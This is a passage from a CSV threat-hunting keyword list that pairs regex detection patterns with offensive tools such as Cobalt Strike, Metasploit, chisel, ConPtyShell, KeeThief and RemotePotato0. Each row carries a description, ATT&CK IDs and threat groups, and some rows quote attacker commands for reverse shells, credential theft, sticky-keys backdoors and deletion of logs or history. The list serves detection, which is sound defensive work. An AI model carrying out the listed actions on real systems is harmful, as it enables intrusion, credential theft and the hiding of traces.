T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*remote_exploit.erb*",".{0,1000}remote_exploit\.erb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*remote_exploit_cmd_stager.*",".{0,1000}remote_exploit_cmd_stager\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*remote_exploit_demo_template.erb*",".{0,1000}remote_exploit_demo_template\.erb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*remote_get_tor_exits_list(*",".{0,1000}remote_get_tor_exits_list\(.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*remote_shell.py*",".{0,1000}remote_shell\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*-remote=127.0.0.1:3000*",".{0,1000}\-remote\=127\.0\.0\.1\:3000.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*RemoteDesktopPassView.zip*",".{0,1000}RemoteDesktopPassView\.zip.{0,1000}","offensive_tool_keyword","rdpv","Remote Desktop PassView is a small utility that reveals the password stored by Microsoft Remote Desktop Connection utility inside the .rdp files.","T1110 - T1560.001 - T1555.003 - T1212","TA0006 - TA0007","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/remote_desktop_password.html","1","0","N/A","8","10","N/A","N/A","N/A","N/A" 
"*remote-exec *jump *",".{0,1000}remote\-exec\s.{0,1000}jump\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*RemoteHashRetrieval.ps1*",".{0,1000}RemoteHashRetrieval\.ps1.{0,1000}","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","10","4","373","78","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z" "*-RemoteIp * -RemotePort * -Rows * -Cols * -CommandLine *.exe*",".{0,1000}\-RemoteIp\s.{0,1000}\s\-RemotePort\s.{0,1000}\s\-Rows\s.{0,1000}\s\-Cols\s.{0,1000}\s\-CommandLine\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully 
Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","0","N/A","10","10","912","157","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" "*remote-method-guesser/rmg*",".{0,1000}remote\-method\-guesser\/rmg.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*remote-method-guesser-master*",".{0,1000}remote\-method\-guesser\-master.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*RemoteNTDLL.cpp*",".{0,1000}RemoteNTDLL\.cpp.{0,1000}","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","1","N/A","9","2","161","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" "*RemoteNTDLL.exe*",".{0,1000}RemoteNTDLL\.exe.{0,1000}","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 
- T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","1","N/A","9","2","161","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" "*remotepipelist *",".{0,1000}remotepipelist\s.{0,1000}","offensive_tool_keyword","RemotePipeList","A small tool that can list the named pipes bound on a remote system.","T1047 - T1021.006","TA0008 - TA0002","N/A","N/A","Discovery","https://github.com/outflanknl/C2-Tool-Collection/tree/main/Other/RemotePipeList","1","1","N/A","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*RemotePipeList is x64 only*",".{0,1000}RemotePipeList\sis\sx64\sonly.{0,1000}","offensive_tool_keyword","RemotePipeList","A small tool that can list the named pipes bound on a remote system.","T1047 - T1021.006","TA0008 - TA0002","N/A","N/A","Discovery","https://github.com/outflanknl/C2-Tool-Collection/tree/main/Other/RemotePipeList","1","1","#contentstrings","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*RemotePipeList.cna*",".{0,1000}RemotePipeList\.cna.{0,1000}","offensive_tool_keyword","RemotePipeList","A small tool that can list the named pipes bound on a remote system.","T1047 - T1021.006","TA0008 - TA0002","N/A","N/A","Discovery","https://github.com/outflanknl/C2-Tool-Collection/tree/main/Other/RemotePipeList","1","1","N/A","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*RemotePipeList.exe*",".{0,1000}RemotePipeList\.exe.{0,1000}","offensive_tool_keyword","RemotePipeList","A small tool that can list the named pipes bound on a remote system.","T1047 - T1021.006","TA0008 - TA0002","N/A","N/A","Discovery","https://github.com/outflanknl/C2-Tool-Collection/tree/main/Other/RemotePipeList","1","1","N/A","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*RemotePotato0*@splinter_code & 
@decoder_it*",".{0,1000}RemotePotato0.{0,1000}\@splinter_code\s\&\s\@decoder_it.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*RemotePotato0.exe*",".{0,1000}RemotePotato0\.exe.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","1","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*remotereg.cna*",".{0,1000}remotereg\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","99","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "*RemoteScanner.exe*",".{0,1000}RemoteScanner\.exe.{0,1000}","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*RemoteShellCodeInjection-master*",".{0,1000}RemoteShellCodeInjection\-master.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z" "*RemoteShellCodeInjection-master.zip*",".{0,1000}RemoteShellCodeInjection\-master\.zip.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","1","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z" "*remotewinenum.rb*",".{0,1000}remotewinenum\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. 
exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Remove_Privilege /Process:* /Privilege:*",".{0,1000}Remove_Privilege\s\/Process\:.{0,1000}\s\/Privilege\:.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*removeexe-persistence*",".{0,1000}removeexe\-persistence.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Remove-Item 
(Get-PSreadlineOption).HistorySavePath*",".{0,1000}Remove\-Item\s\(Get\-PSreadlineOption\)\.HistorySavePath.{0,1000}","offensive_tool_keyword","powershell","Delete powershell history","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","0","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*Remove-Item *C:\Program Files*\TeamViewer\TeamViewer*_Logfile.log*",".{0,1000}Remove\-Item\s.{0,1000}C\:\\Program\sFiles.{0,1000}\\TeamViewer\\TeamViewer.{0,1000}_Logfile\.log.{0,1000}","offensive_tool_keyword","malware","observed usage of third-party tools. such as anydesk or teamviewer to access remote hosts. deletion of these logs file is suspicious and could be the actions of intruders hiding their traces","T1070","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Remove-Item *C:\Users\*\AppData\Roaming\AnyDesk\connection_trace.txt*",".{0,1000}Remove\-Item\s.{0,1000}C\:\\Users\\.{0,1000}\\AppData\\Roaming\\AnyDesk\\connection_trace\.txt.{0,1000}","offensive_tool_keyword","malware","observed usage of third-party tools. such as anydesk or teamviewer to access remote hosts. 
deletion of these logs file is suspicious and could be the actions of intruders hiding their traces","T1070","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Remove-ItemProperty *HKLM:\SOFTWARE\YourSoftware\Schedule\TaskCache\Tree\* -Name *SD*",".{0,1000}Remove\-ItemProperty\s.{0,1000}HKLM\:\\SOFTWARE\\YourSoftware\\Schedule\\TaskCache\\Tree\\.{0,1000}\s\-Name\s.{0,1000}SD.{0,1000}","offensive_tool_keyword","powershell","the threat actor deleted the SD value within the Tree registry path (hide scheduled task creation)","T1562","TA0005","Tarrask Malware","HAFNIUM","Defense Evasion","https://www.microsoft.com/en-us/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/","1","0","risk of False positive","9","10","N/A","N/A","N/A","N/A" "*Remove-KeePassConfigTrigger*",".{0,1000}Remove\-KeePassConfigTrigger.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","895","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" "*RemoveKeePassTrigger.ps1*",".{0,1000}RemoveKeePassTrigger\.ps1.{0,1000}","offensive_tool_keyword","crackmapexec","Keepass exploitations from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*RemoveKeePassTrigger.ps1*",".{0,1000}RemoveKeePassTrigger\.ps1.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*remove-persistence*",".{0,1000}remove\-persistence.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Remove-Persistence.ps1*",".{0,1000}Remove\-Persistence\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration 
testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Remove-Persistence.ps1*",".{0,1000}Remove\-Persistence\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*remove-persistence-cron*",".{0,1000}remove\-persistence\-cron.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Remove-PoshRat*",".{0,1000}Remove\-PoshRat.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Remove-PoshRat.ps1*",".{0,1000}Remove\-PoshRat\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*removeRegTrace*",".{0,1000}removeRegTrace.{0,1000}","offensive_tool_keyword","AoratosWin","A tool that removes traces of executed applications on Windows OS.","T1070 - T1564","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" "*Remove-Update.ps1*",".{0,1000}Remove\-Update\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Remove-VolumeShadowCopy*",".{0,1000}Remove\-VolumeShadowCopy.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*ren sethc.exe sethcbad.exe*",".{0,1000}ren\ssethc\.exe\ssethcbad\.exe.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*ren sethcold.exe sethc.exe*",".{0,1000}ren\ssethcold\.exe\ssethc\.exe.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*renameMachine.py -current-name * -new-name * -dc-ip * *:*",".{0,1000}renameMachine\.py\s\-current\-name\s.{0,1000}\s\-new\-name\s.{0,1000}\s\-dc\-ip\s.{0,1000}\s.{0,1000}\:.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*renameMachine.py -current-name * -new-name*",".{0,1000}renameMachine\.py\s\-current\-name\s.{0,1000}\s\-new\-name.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1078.001 - T1078.002 - T1059.003 - T1059.001 - T1053.005 - T1021.001 - T1003.001 - T1003.002 - T1003.004 - T1001.001 ","TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*replace_key_iv_shellcode*",".{0,1000}replace_key_iv_shellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
